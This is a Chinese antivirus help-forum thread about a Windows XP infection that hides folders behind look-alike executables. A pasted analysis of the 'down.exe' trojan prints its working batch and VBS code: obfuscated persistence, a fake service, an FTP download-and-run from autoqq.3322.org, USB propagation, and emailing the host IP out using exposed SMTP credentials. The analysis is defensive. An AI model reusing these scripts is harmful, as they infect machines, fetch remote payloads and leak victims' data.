中了一病毒，主要症状表现为，把正常文件夹属性更改为系统文件夹属性，可能是创建跟这个文件夹一样名称的可执行程序，图标是普通文件夹一样的图标，写入大量的计划任务，指向IE文件夹（后面的没看到），然后进程里就弹出什么SYSTEN.EXE、FIND.EXE等进程，然后机器变的很慢，请问各位高手，这个是什么病毒？瑞星、x、金山、卡巴、360都查不出``紧急！WINXPSP3系统！尽快回复为盼！

SRE日志

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

急需要模仿文件夹的那病毒文件

没病毒文件永远加不了库

昨天已经跑了一求助的不提供样本了

日志看不出可疑进程。
使用卡卡助手-高级工具-系统修复，修复hosts文件。
打开控制面板-计划任务，清空计划任务内容。
上传计划任务中显示的病毒样本到可疑文件交流区，地址为：http://bbs.ikaka.com/showforum-20002.aspx
或者直接发送给瑞星的邮件服务中心【病毒样本】地址为：http://mailcenter.rising.com.cn/uploadnew.aspx

我看不全计划任务中具体的文件指向，我晕死·好像是个链接·
你们看看·

计划任务那复制两个发来看

然后都删除去。

急需要你说的模仿文件夹的那病毒文件样本

下面就是了，你们看看`

分析的怎么样啊？

人家的分析，我刚找到的


2009年05月03日 星期日 18:26
过x样本down.exe的分析。

帮同学修复U盘的时候拿到的。
一个猥琐的木马，使用了大量的脚本、批处理、计划任务等手段，终于逃过了Micropoint的监控……
非常猥琐~

下面是分析~

Trojan/Win32.IAgent

病毒使用vb6编写~  ASPack加壳。

原始工程名~
D盘感染(2.22确定).vbp

源码应该放在作者电脑的E盘~~~哈哈~



作者的VB安装目录
X:\Program Files\Microsoft Visual Studio\VB98

作者Q号~~ (sunhopp@tom.com)


使用at命令创建大量计划任务，命令行为
cmd /c cmd<C:\windows\system32\attusb.dll



在system32目录下创建

%systsmroot%\system32\attusb.dll ;一个辅助感染的批处理
%systsmroot%\system32\down.exe ;木马的副本



attusb.dll内容是一个批处理文件。代码如下：

Tasklist/SVC |find /i "Systen.exe" && taskkill /f /im cmd.exe
^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^c^m^d^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^S^y^s^t^e^n^.^e^x^e /y
^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^p^i^n^g^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^E^X^P^L^0^R^E^R^.^E^X^E /y
Systen /c %SystemRoot%\system32\autousb.bat

在计划任务里面使用 cmd /c<C:\windows\system32\attusb.dll 命令行来运行这个批处理。
使用“^“逃避路径检测。cmd执行的是这样的代码

Tasklist/SVC |find /i "Systen.exe" && taskkill /f /im cmd.exe
;查找 systen.exe 进程（cmd的副本）。同时关闭cmd.exe
copy C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\Systen.exe /y
;复制 cmd.exe，改名为 systen.exe
copy C:\WINDOWS\system32\ping.exe C:\WINDOWS\system32\EXPL0RER.EXE /y
;复制 ping.exe，改名为 explorer.exe
Systen /c %SystemRoot%\system32\autousb.bat
;使用systen.exe（实际为cmd.exe的副本）执行 %SystemRoot%\system32\autousb.bat

遍历D盘根目录下的所有文件夹，保存列表到
%SystemRoot%\system32\ok.txt



同时隐藏D盘所有文件夹，并建立同名的.exe副本诱惑用户点击



如果插入了U盘，将做同样的感染。

创建win.bat，内容如下。
功能是用来创建自启动项（不过我没有看到生成了什么文件）

@ dir %SystemRoot%\system32 |find "SuCH0ST.exe"
@ if %ERRORLEVEL%==0 goto ok
@ if %ERRORLEVEL%==1 goto end
:ok
@ net stop sharedaccess
sc stop sharedaccess
^c^o^p^y ^c^m^d^.^e^x^e ^S^V^C^H^0^S^.^e^x^e /y
@ cmd /c sc create DNSSystem binpath= "%systemroot%\system32\SVCH0S                                                                                /c start SuCH0ST.exe " start= auto
@ cmd /c sc config DNSSystem displayname= "System DNS"
@ cmd /c sc config DNSSystem type= interact type= own
@ cmd /c sc description DNSSystem "(C) Microsoft Corporation 公司提供的(DNS)域名解析程序,如果该服务被停用，任何依赖它的服务将无法启动。"
@ sc start DNSSystem
%SystemRoot%\system32\SuCH0ST.exe
@ exit
:end
@ net stop sharedaccess
sc stop sharedaccess
del boot.exe /q
echo o autoqq.3322.org > 1.RMVB&echo 1234 >> 1.RMVB&echo 1234 >> 1.RMVB&echo get boot.exe boot.exe >> 1.RMVB&echo del down.exe >> 1.RMVB&echo bye >> 1.RMVB
ftp -s:1.RMVB
del 1.RMVB
ping 127.0.0.1 -n 3
cmd /c boot.exe
ping 127.0.0.1 -n 10
del %SystemRoot%\system32\boot.exe /q
echo o autoqq.3322.org > 2.RMVB&echo 4567 >> 2.RMVB&echo 4567 >> 2.RMVB&echo get boot.exe boot.exe >> 2.RMVB&echo del down.exe >> 2.RMVB&echo bye >> 2.RMVB
ftp -s:2.RMVB
del 2.RMVB
exit

创建autousb.bat，用来写入autorun

setlocal EnableDelayedExpansion
:1
fsutil fsinfo drives >%SystemRoot%\system32\output.txt
find ":\" < %SystemRoot%\system32\output.txt >%SystemRoot%\system32\out.txt
del %SystemRoot%\system32\output.txt /q
for /f %%i in (%SystemRoot%\system32\out.txt) do (
fsutil fsinfo drivetype %%i|find "可移动驱动器" &&echo %%i>>%SystemRoot%\system32\output.txt
)
if not exist %SystemRoot%\system32\output.txt goto 3
for /f %%r in (%SystemRoot%\system32\output.txt) do (
set var=%%r
cd /d !var!
dir /a:d-s /b > %SystemRoot%\system32\ok.txt
for /f  "delims=" %%q in (%SystemRoot%\system32\ok.txt) do (
ATTRIB  "%%q" +s +h & copy %SystemRoot%\system32\down.exe "!var!%%q.exe"
)
)
:3
EXPL0RER /n 10 127.0.1 &goto 1
;其实是调用ping延时 + 死循环

创建mail3.vbs，用来发送邮件（什么年代了。。。）
哈哈，这位大牛的Q号也在哈~

On Error Resume Next
mailto="294503954@qq.com" '路过~~~
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("C:\WINDOWS\system32\mailbody.txt",1)
mailbody=f.ReadAll
f.Close
NameSpace = "http://schemas.microsoft.com/cdo/configuration/"
set Email = CreateObject("CDO.Message")
Email.From = "sunhopp@tom.com"
Email.To = mailto
Email.Subject = mailbody
Email.Textbody = mailbody
with Email.Configuration.Fields
.Item(NameSpace&"sendusing") = 2
.Item(NameSpace&"smtpserver") = "smtp.tom.com"
.Item(NameSpace&"smtpserverport") = 25
.Item(NameSpace&"smtpauthenticate") = 1
.Item(NameSpace&"sendusername") = "sunhopp"'这位同学的邮箱账户~~~
.Item(NameSpace&"sendpassword") = "autocad" '这位同学的邮箱密码~~~
.Update
end With
Email.Send
Wscript.quit

创建mailbody.txt。我只在里面看到了本机的IP。估计还有其他记录功能。

我是问求助的楼主和你是同一个人？？？？

文件已经看了

去用我签名处的文件夹自助清理试试

应该可以解决了

解决病毒后，再去自己删除那计划任务吧